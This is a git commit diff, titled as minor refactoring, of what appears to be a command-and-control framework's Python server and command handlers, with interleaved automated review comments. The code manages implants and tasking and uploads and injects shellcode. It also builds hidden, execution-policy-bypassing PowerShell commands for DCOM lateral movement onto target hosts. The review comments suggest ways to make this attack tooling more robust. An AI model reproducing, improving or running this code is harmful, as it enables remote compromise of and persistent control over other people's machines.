Minor refactoring
parent
58a3545499
commit
acfade268e
12
C2Server.py
12
C2Server.py
|
@ -50,11 +50,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
QuickCommandURI = select_item("QuickCommand", "C2Server")
|
QuickCommandURI = select_item("QuickCommand", "C2Server")
|
||||||
s.server_version = ServerHeader
|
s.server_version = ServerHeader
|
||||||
s.sys_version = ""
|
s.sys_version = ""
|
||||||
if s.cookieHeader:
|
if not s.cookieHeader:
|
||||||
r = ""
|
|
||||||
else:
|
|
||||||
s.cookieHeader = "NONE"
|
s.cookieHeader = "NONE"
|
||||||
# class Tasks()
|
|
||||||
|
|
||||||
# implant gets a new task
|
# implant gets a new task
|
||||||
new_task = newTask(s.path)
|
new_task = newTask(s.path)
|
||||||
|
@ -139,7 +136,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
s.send_header("Content-type", "application/x-msdownload")
|
s.send_header("Content-type", "application/x-msdownload")
|
||||||
s.end_headers()
|
s.end_headers()
|
||||||
s.wfile.write(content)
|
s.wfile.write(content)
|
||||||
# class Implant()
|
|
||||||
# register new implant
|
# register new implant
|
||||||
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
|
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
|
||||||
implant_type = "Normal"
|
implant_type = "Normal"
|
||||||
|
@ -264,7 +260,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
||||||
else:
|
else:
|
||||||
print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
|
||||||
#print decCookie,Colours.END
|
|
||||||
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
|
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
|
||||||
outputParsed = outputParsed.rstrip()
|
outputParsed = outputParsed.rstrip()
|
||||||
|
|
||||||
|
@ -283,7 +278,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
||||||
print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
||||||
# What should this be now?
|
|
||||||
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
|
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
|
||||||
update_task(taskId, "Upload shellcode complete")
|
update_task(taskId, "Upload shellcode complete")
|
||||||
print ("Upload shellcode complete")
|
print ("Upload shellcode complete")
|
||||||
|
@ -360,9 +354,9 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
print (Colours.GREEN)
|
print (Colours.GREEN)
|
||||||
print (outputParsed + Colours.END)
|
print (outputParsed + Colours.END)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
e = ""
|
|
||||||
# print e
|
# print e
|
||||||
# traceback.print_exc()
|
# traceback.print_exc()
|
||||||
|
pass
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
s.send_response(200)
|
s.send_response(200)
|
||||||
|
@ -384,7 +378,6 @@ if __name__ == '__main__':
|
||||||
print (Colours.GREEN + logopic)
|
print (Colours.GREEN + logopic)
|
||||||
print (Colours.END + "")
|
print (Colours.END + "")
|
||||||
|
|
||||||
# KeyFile = None, CertFile = None, ClientCertCAs = None
|
|
||||||
if os.path.isfile(Database):
|
if os.path.isfile(Database):
|
||||||
print ("Using existing database / project" + Colours.GREEN)
|
print ("Using existing database / project" + Colours.GREEN)
|
||||||
C2 = get_c2server_all()
|
C2 = get_c2server_all()
|
||||||
|
@ -481,7 +474,6 @@ if __name__ == '__main__':
|
||||||
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
|
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
|
||||||
else:
|
else:
|
||||||
raise ValueError("Cannot find the certificate files")
|
raise ValueError("Cannot find the certificate files")
|
||||||
#logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
httpd.serve_forever()
|
httpd.serve_forever()
|
||||||
|
|
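Review bot: The `except Exception as e:` branch in the -360 hunk still discards every error: swapping `e = ""` for `pass` keeps the old behaviour, leaves `e` bound but unused, and the `finally` branch then answers 200 regardless. A failure while handling returned task output is therefore invisible on the console and in any later review of the server's output. Consider reporting it, e.g. `print ("Error processing task output: %s" % e)`, or re-enabling the commented `traceback.print_exc()` if `traceback` is imported (not visible here). The `try` starts outside the hunk, so what it covers cannot be confirmed from this page. Separately, the -283 hunk deletes the `# What should this be now?` comment while the `elif` below it still ORs two identical `startswith("$shellcode64")` tests, so the second operand is redundant as written.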
|
@ -148,7 +148,7 @@ def startup(user, printhelp = ""):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("cls")
|
print ("cls")
|
||||||
print (chr(27) + "[2J")
|
print (chr(27) + "[2J")
|
||||||
print (Colours.GREEN + "")
|
print (Colours.GREEN)
|
||||||
print (logopic)
|
print (logopic)
|
||||||
print ("")
|
print ("")
|
||||||
|
|
||||||
|
|
|
@ -181,7 +181,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
new_task(cmd, user, randomuri)
|
new_task(cmd, user, randomuri)
|
||||||
|
|
||||||
# wmi lateral movement
|
# wmi lateral movement
|
||||||
|
|
||||||
elif "invoke-wmiproxypayload" in command.lower():
|
elif "invoke-wmiproxypayload" in command.lower():
|
||||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||||
|
@ -218,7 +217,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
new_task(cmd, user, randomuri)
|
new_task(cmd, user, randomuri)
|
||||||
|
|
||||||
# dcom lateral movement
|
# dcom lateral movement
|
||||||
|
|
||||||
elif "invoke-dcomproxypayload" in command.lower():
|
elif "invoke-dcomproxypayload" in command.lower():
|
||||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||||
|
@ -226,7 +224,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
params = params.sub("", command)
|
params = params.sub("", command)
|
||||||
p = re.compile(r'(?<=-target.).*')
|
p = re.compile(r'(?<=-target.).*')
|
||||||
target = re.search(p, command).group()
|
target = re.search(p, command).group()
|
||||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
|
||||||
new_task(pscommand, user, randomuri)
|
new_task(pscommand, user, randomuri)
|
||||||
else:
|
else:
|
||||||
startup(user, "Need to run createproxypayload first")
|
startup(user, "Need to run createproxypayload first")
|
||||||
|
@ -237,7 +235,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
||||||
p = re.compile(r'(?<=-target.).*')
|
p = re.compile(r'(?<=-target.).*')
|
||||||
target = re.search(p, command).group()
|
target = re.search(p, command).group()
|
||||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
||||||
new_task(pscommand, user, randomuri)
|
new_task(pscommand, user, randomuri)
|
||||||
else:
|
else:
|
||||||
startup(user, "Need to run createdaisypayload first")
|
startup(user, "Need to run createdaisypayload first")
|
||||||
|
@ -250,11 +248,10 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
||||||
payload = newPayload.CreateRawBase()
|
payload = newPayload.CreateRawBase()
|
||||||
p = re.compile(r'(?<=-target.).*')
|
p = re.compile(r'(?<=-target.).*')
|
||||||
target = re.search(p, command).group()
|
target = re.search(p, command).group()
|
||||||
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
|
||||||
new_task(pscommand, user, randomuri)
|
new_task(pscommand, user, randomuri)
|
||||||
|
|
||||||
# runas payloads
|
# runas payloads
|
||||||
|
|
||||||
elif "invoke-runasdaisypayload" in command.lower():
|
elif "invoke-runasdaisypayload" in command.lower():
|
||||||
daisyname = raw_input("Name required: ")
|
daisyname = raw_input("Name required: ")
|
||||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
||||||
|
|
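Review bot: Each `target = re.search(p, command).group()` line in handle_ps_command (hunks at -226, -237 and -250) raises AttributeError when the command carries no `-target` argument, because `re.search` returns None in that case. The missing-payload case already goes through `startup(user, "...")`; the same pattern would fit here, e.g. `m = re.search(p, command)` followed by `if m is None: startup(user, "-target is required")` before `.group()` is used. On style, the `pscommand` template is pasted three times, which is why this commit repeats the same backslash fix in each copy; defining the shared part once would keep the next quoting fix in one place. The function body starts and ends outside these hunks.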
|
@ -75,7 +75,6 @@ def handle_sharp_command(command, user, randomuri, startup):
|
||||||
try:
|
try:
|
||||||
shellcodefile = load_file(path)
|
shellcodefile = load_file(path)
|
||||||
if shellcodefile != None:
|
if shellcodefile != None:
|
||||||
arch = "64"
|
|
||||||
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
|
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print ("Error loading file: %s" % e)
|
print ("Error loading file: %s" % e)
|
||||||
|
|